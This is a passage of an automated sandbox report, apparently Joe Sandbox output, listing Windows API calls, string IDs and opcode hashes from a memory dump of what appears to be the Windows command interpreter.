• Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: ErrorFileLast$DeleteRead_get_osfhandle
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 3588551418-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 7b3e9ef8f9e00def7e0f555f85ef5a51875302e682b222ee2a1690b22849d021
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 1a558f671a92b96693ebf89c1e29043931029e638ba01378ec090483a4cb3d22
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7b3e9ef8f9e00def7e0f555f85ef5a51875302e682b222ee2a1690b22849d021
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0C417C32E1864B8BF714AB51A45427DF761EB85B90FD4403AE64F477B1CEBCE8808B60
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
• Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: ErrorModememset$FullNamePath_wcsicmp
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 2123716050-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: Console$Window_get_osfhandle$InitializeModeUninitializememset
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 3114114779-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF7D1539A82), ref: 00007FF7D153A77A
                                                                                                                                                                                                                                                                                                                                                                                                                                        • RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF7D1539A82), ref: 00007FF7D153A7AF
                                                                                                                                                                                                                                                                                                                                                                                                                                        • RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF7D1539A82), ref: 00007FF7D153A80E
                                                                                                                                                                                                                                                                                                                                                                                                                                        • SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF7D1539A82), ref: 00007FF7D153A839
                                                                                                                                                                                                                                                                                                                                                                                                                                        • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF7D1539A82), ref: 00007FF7D153A850
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: QueryValue$CloseErrorLastOpen
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 2240656346-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D15201B8: _get_osfhandle.MSVCRT ref: 00007FF7D15201C4
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D15201B8: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF7D152E904,?,?,?,?,00000000,00007FF7D1523491,?,?,?,00007FF7D1534420), ref: 00007FF7D15201D6
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF7D153D0F9
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0 ref: 00007FF7D153D10F
                                                                                                                                                                                                                                                                                                                                                                                                                                        • ScrollConsoleScreenBufferW.API-MS-WIN-CORE-CONSOLE-L2-1-0 ref: 00007FF7D153D166
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF7D153D17A
                                                                                                                                                                                                                                                                                                                                                                                                                                        • SetConsoleCursorPosition.API-MS-WIN-CORE-CONSOLE-L2-1-0 ref: 00007FF7D153D18C
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
• Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: Console$BufferHandleScreen$CursorFileInfoPositionScrollType_get_osfhandle
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 3008996577-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: CreateSemaphore
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: _p0$wil
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 1078844751-1814513734
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        • RtlCreateUnicodeStringFromAsciiz.NTDLL ref: 00007FF7D153B934
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GlobalAlloc.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF7D1525085), ref: 00007FF7D153B9A5
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GlobalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF7D1525085), ref: 00007FF7D153B9F7
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: Global$AllocAsciizCreateFreeFromStringUnicode
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: %WINDOWS_COPYRIGHT%
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 1103618819-1745581171
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
• Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: memset$_wcslwr
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: [%s]
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 886762496-302437576
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: edde6ab5db54e3a5535b346c374fc5c976f6442aa931e6f93dfa572844f0dcb2
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: ca8e2a1b414ea380d711f9c454c4aa0e55d4a13fba3e59700edb5f751f05f94b
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: edde6ab5db54e3a5535b346c374fc5c976f6442aa931e6f93dfa572844f0dcb2
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FA317932705B8A85FB21AB22D8503EDA7A0FB89B88F954136DA4E47B65DF7CD2458310
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D15233A8: iswspace.MSVCRT(?,?,00000000,00007FF7D153D6EE,?,?,?,00007FF7D1530632), ref: 00007FF7D15233C0
                                                                                                                                                                                                                                                                                                                                                                                                                                        • iswspace.MSVCRT(?,?,?,00007FF7D15232A4), ref: 00007FF7D152331C
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: iswspace
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: off
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 2389812497-733764931
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 23619b9e270ea0a6abcdd2ffa6124d8d0217e46963fde130039e410627268166
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: beb9a02507d0020e5df83b13a7ad2f7702788e55974cf8f532388b0e0054dcac
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 23619b9e270ea0a6abcdd2ffa6124d8d0217e46963fde130039e410627268166
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BF219222E0C65B81FBA07B15941027DE690EF59B80FD88076DA4F8B7A4DEECE540D321
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: wcschr$Heapiswspace$AllocProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: %s=%s$DPATH$PATH
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 3731854180-3148396303
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: fb3125d80182464f50c82bc0c4d5350ea8168baa4617960a2893f38ef28f8be7
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 62ed8453b084583fac42654c7a84691a1a7561437b2953b65109ce16d138c36b
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fb3125d80182464f50c82bc0c4d5350ea8168baa4617960a2893f38ef28f8be7
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B521BBA2B0965B80FF50AB55E4402BDE2A0AF81B80FD89137C90F437B5DEBCE4448360
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: wcscmp
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: *.*$????????.???
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 3392835482-3870530610
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 2267b9e2c7923373c3284e1f11a26023b10064941758683347217dc228a16a6c
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: cab2b395ec11626ea7e23074bb7efcf89a5e0a09d5558e18932e05e7277afa1c
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2267b9e2c7923373c3284e1f11a26023b10064941758683347217dc228a16a6c
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B611C626B14A6B41F764AB16A44013DB2E0FB44B80FD850B2CE4E87BA9DFBDE4418710
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: fprintf
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: CMD Internal Error %s$%s$Null environment
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 383729395-2781220306
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 0cb055b157f36561183311c9dd91b0f05aa56f2c0aaf14e14510f586112b26cc
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 38ad5b02cc2252f43376ad96edbad080f36ae9244483b0fe974c493cedd0b9ee
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0cb055b157f36561183311c9dd91b0f05aa56f2c0aaf14e14510f586112b26cc
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B711BF6290864B81FB65AB14E9001BDA260EB457B0FD04337DA7F532F4EFACE8418390
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: iswspacewcschr
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC$=,;
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 287713880-1183017076
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 8fcb7a04138a3b23992a7cdb16ce22985c951060ce84957cc9b0662892501dea
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 263d6c7b004025f4b2a309db29ad57c0471cf254085b515d9731592ce87fb08f
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8fcb7a04138a3b23992a7cdb16ce22985c951060ce84957cc9b0662892501dea
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3CF04422E1A65B81FB649B81E40027EEAA0FF44F40FD59372D95F82674EFBCD480C620
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: AddressHandleModuleProc
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: KERNEL32.DLL$SetThreadUILanguage
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 1646373207-2530943252
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 33fd74526e8d725267334377f69302da3f837b9787d184b3d8809460f86dc4c4
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 04eceb11c5e6a44ba6dce340976ddb83671508925d267d7f94f2972208a5cdf0
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 33fd74526e8d725267334377f69302da3f837b9787d184b3d8809460f86dc4c4
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C5010821A0AA0FC1FB44AB11E85123CA2A0AF49730FD40377D92F427F0DEFCA5818320
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
• Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
Similarity
• API ID: AddressHandleModuleProc
• String ID: RaiseFailFastException$kernelbase.dll
• API String ID: 1646373207-919018592
• Opcode ID: 3febe13a05f537dc5e67cec473ac92f04f036d5fc975d7a9241dfcd9d5059c04
• Instruction ID: f971f7f1864754798e9c7dca3868d56d6cf29aa9825d7e6e2a119dfb5e6b01ee
• Opcode Fuzzy Hash: 3febe13a05f537dc5e67cec473ac92f04f036d5fc975d7a9241dfcd9d5059c04
• Instruction Fuzzy Hash: BDF01D21A1869A92F744AB12F444069EA60EF89B90BD49136D94F03724CF7CD5458710
APIs
Memory Dump Source
• Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
• Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
Similarity
• API ID: memset$CurrentDirectorytowupper
• String ID:
• API String ID: 1403193329-0
• Opcode ID: 8f12ec0cfcd936a987ebeb0b3721ecca5b9c81898bdfe4a19f372ac06b3fdf31
• Instruction ID: 845776a651dec02c376f4910fe7b9387625107c2acd8819f381227055d80d9a2
• Opcode Fuzzy Hash: 8f12ec0cfcd936a987ebeb0b3721ecca5b9c81898bdfe4a19f372ac06b3fdf31
• Instruction Fuzzy Hash: 9D61BF32A08B868AF760EB25D4402EDB7A1FB44758FD44176DE5E43AA9DFBCD480C720
APIs
Memory Dump Source
• Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
• Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
Similarity
• API ID: _wcsnicmp$wcschr
• String ID:
• API String ID: 3270668897-0
• Opcode ID: 0c5351208ff2a5a36442746df2c9d56de1180022aab67ae3c28b2a55d3b35da5
• Instruction ID: 7bfb1f83745d1f30d4398a7b43d5157a6fa3d03bbb31ce675dc95920c6bb3d6b
• Opcode Fuzzy Hash: 0c5351208ff2a5a36442746df2c9d56de1180022aab67ae3c28b2a55d3b35da5
• Instruction Fuzzy Hash: 16518C52E4864B81FB61BF1594101BDA3A1EF46B80FD88076CA0F872F6DFACE9518360
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
• Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: memset$DriveFullNamePathType
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 3442494845-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailure
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 140117192-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: wcstol$lstrcmp
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 3515581199-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: File_get_osfhandle$TimeWrite
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 4019809305-0
APIs
Memory Dump Source
• Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
• Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
Similarity
• API ID: memset$DriveNamePathTypeVolume
• String ID:
• API String ID: 1029679093-0
APIs
Similarity
• API ID: File$DeleteErrorLastWrite_get_osfhandle
• String ID:
• API String ID: 2448200120-0
APIs
Similarity
• API ID: Heap$AllocProcess
• String ID:
• API String ID: 1617791916-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1523C24: GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF7D1523D0C
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1523C24: towupper.MSVCRT ref: 00007FF7D1523D2F
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1523C24: iswalpha.MSVCRT ref: 00007FF7D1523D4F
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1523C24: towupper.MSVCRT ref: 00007FF7D1523D75
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1523C24: GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7D1523DBF
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7D153EA0F,?,?,?,00007FF7D153E925,?,?,?,?,00007FF7D151B9B1), ref: 00007FF7D1516ABF
                                                                                                                                                                                                                                                                                                                                                                                                                                        • RtlFreeHeap.NTDLL ref: 00007FF7D1516AD3
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1516B84: SetEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,00007FF7D1516AE8,?,?,?,00007FF7D153EA0F,?,?,?,00007FF7D153E925), ref: 00007FF7D1516B8B
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1516B84: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,00007FF7D1516AE8,?,?,?,00007FF7D153EA0F,?,?,?,00007FF7D153E925), ref: 00007FF7D1516B97
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1516B84: RtlFreeHeap.NTDLL ref: 00007FF7D1516BAF
